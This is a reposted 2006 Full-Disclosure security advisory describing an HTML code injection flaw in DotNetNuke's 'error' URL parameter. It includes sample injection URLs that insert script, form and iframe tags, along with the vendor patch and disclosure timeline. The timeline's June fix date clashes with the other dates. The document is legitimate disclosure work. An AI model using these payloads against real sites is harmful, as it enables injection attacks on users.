Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14348
HistorySep 20, 2006 - 12:00 a.m.

[Full-disclosure] DotNetNuke HTML Code Injection

2006-09-2000:00:00
vulners.com
24
JSON

Security Advisory: VULN20-09-2006 -
http://www.secureshapes.com/advisories/vuln20-09-2006.htm

Vendor Security Bulletin:
http://dotnetnuke.com/About/WhatIsDotNetNuke/SecurityPolicy/SecurityBulletin
no3/tabid/990/Default.aspx


DotNetNuke - HTML Code Injection Vulnerability

  • Date: 20/09/2006

  • Severity: Low

  • Impact: Code Injection

  • Solution Status: Vendor Patch

  • Version: All versions of DotNetNuke

  • Vendor Website: http://dotnetnuke.com/

:: ABOUT THE SOFTWARE

DotNetNuke® is an Open Source Framework ideal for creating Enterprise Web
Applications.

Unfortunately, DotNetNuke is vulnerable to HTML code injection.

:: TECHNICAL DESCRIPTION

The error variable available in the URL can be manipulated and it is
possible to inject HTML code.

Example:

http://xxxxxx/Default.aspx?tabid=510&error=The+state+information+is+invalid+
for+this+page+and+might+be+corrupted

It is possible to inject HTML code in that error variable.

In particular, it also possible to reproduce the character "space" inserting
some complete HTML tags such as <script></script> and/or <form></form> in
the injected code. This will allow the attacker to specify attributes in the
HTML tags.

Example:

http://xxxxxxxxxxxx/Default.aspx?tabid=510&amp;error=&quot;&lt;script&gt;&lt;/script&gt;/&gt;&lt;iframe
<script></script>src=http://www.google.com>

or

http://xxxxxxxxxxxx/Default.aspx?tabid=510&amp;error=&quot;&lt;form&gt;&lt;/form&gt;/&gt;&lt;iframe&lt;for
m></form>src=http://www.google.com>

In the HTML source code, this injection will result:

<form name="Form" method="post" action="/Default.aspx?tabid=510&error="
/><iframe src=http://www.google.com>" id="Form"
enctype="multipart/form-data" style="height: 100%;">

The space in the HTML code between iframe and src is generated because of
the complete tag injected previously.

:: VENDOR RESPONSE

The vendor security bulletin link is:

http://dotnetnuke.com/About/WhatIsDotNetNuke/SecurityPolicy/SecurityBulletin
no3/tabid/990/Default.aspx

The patches are available here:

http://www.dotnetnuke.com/tabid/125/default.aspx - registration needed in
order to download them

:: DISCLOSURE TIMEFRAME

04/09/2006 - Preliminary Vendor notification.

06/09/2006 - Vulnerability confirmed in all versions

17/06/2006 - DotNetNuke releases version 3.3.5 and 4.3.5 with fix

20/09/2006 - Coordinated public release.

Total Time to Fix: 13 days

:: CREDIT

The vulnerability was discovered by Roberto Suggi Liverani and Antonio Spera
of Secure Shapes.


About Secure Shapes

Secure Shapes Ltd provides vulnerability assessments , website penetration
testing , network penetration testing and security consultancy.

E-mail: contact [at] secureshapes.com

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

JSON